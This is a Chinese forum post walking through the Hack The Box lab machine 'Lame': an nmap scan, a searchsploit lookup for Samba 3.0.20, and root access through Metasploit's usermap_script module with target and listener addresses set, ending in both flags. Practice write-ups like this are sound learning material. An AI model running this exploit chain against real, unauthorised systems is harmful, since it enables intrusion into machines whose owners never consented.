Hack The Box-----------Lame
# Hack The Box-----------Lame在家准备考研,更新慢~~~
`作者`:0x3ml
`个人博客`:[零度安全](https://ctf101.gitee.io/)
`人生格言`:不管你有多菜,心中也一定要自信,别自负哦!
## 靶机介绍
`名称 `:Lame
`目标`:寻找root.txt和user.txt
`难度`:容易
!(https://gitee.com/ctf101/mycdn/raw/master/img/image-20220108195339795.png)
## 打靶过程
1. 连接hack the box的v p n
```
openvpnxxxx.ovpn
```
!(https://gitee.com/ctf101/mycdn/raw/master/img/image-20220108195616021.png)
2. 使用nmap进行资产收集
```
sudo nmap -Pn -A 10.10.10.3
```
!(https://gitee.com/ctf101/mycdn/raw/master/img/image-20220108195937991.png)
!(https://gitee.com/ctf101/mycdn/raw/master/img/image-20220108200445245.png)
3. 尝试连接21端口,但是里面没东西
!(https://gitee.com/ctf101/mycdn/raw/master/img/image-20220108200648438.png)
4. 发现 445/tcp opentcpwrapped Samba smbd 3.0.20-Debian这个存在可以利用的漏洞
5. 查找的Samba 3.0.20的可利用漏洞
```
sudo searchsploit Samba 3.0.20
```
!(https://gitee.com/ctf101/mycdn/raw/master/img/image-20220108201224092.png)
6. 使用msf框架,进行打靶
```
sudo msfconsole
```
!(https://gitee.com/ctf101/mycdn/raw/master/img/image-20220108201528866.png)
7. 进入msf, 查找Samba
```
search Samba
```
!(https://gitee.com/ctf101/mycdn/raw/master/img/image-20220108201755173.png)
8. 使用模块
```
use exploit/multi/samba/usermap_script
```
!(https://gitee.com/ctf101/mycdn/raw/master/img/image-20220108202159549.png)
9. 设置好选项
```
set rhosts 10.10.10.3
set lhost 10.10.17.237
```
!(https://gitee.com/ctf101/mycdn/raw/master/img/image-20220108202326432.png)
10. 查看用户为root
!(https://gitee.com/ctf101/mycdn/raw/master/img/image-20220108202625794.png)
11. 寻找flag,进入root目录下,发现root.txt
!(https://gitee.com/ctf101/mycdn/raw/master/img/image-20220108202751791.png)
12. 查看root.txt文件,发现第一个flag
!(https://gitee.com/ctf101/mycdn/raw/master/img/image-20220108202900424.png)
13. 进入home目录下的makis,发现第二个flag为user.txt
!(https://gitee.com/ctf101/mycdn/raw/master/img/image-20220108203241153.png) 哦(゚o゚;加油(ง •̀_•́)ง 哇哦,good 不明觉厉{:1_927:} 楼主辛苦,谢谢分享!
页:
[1]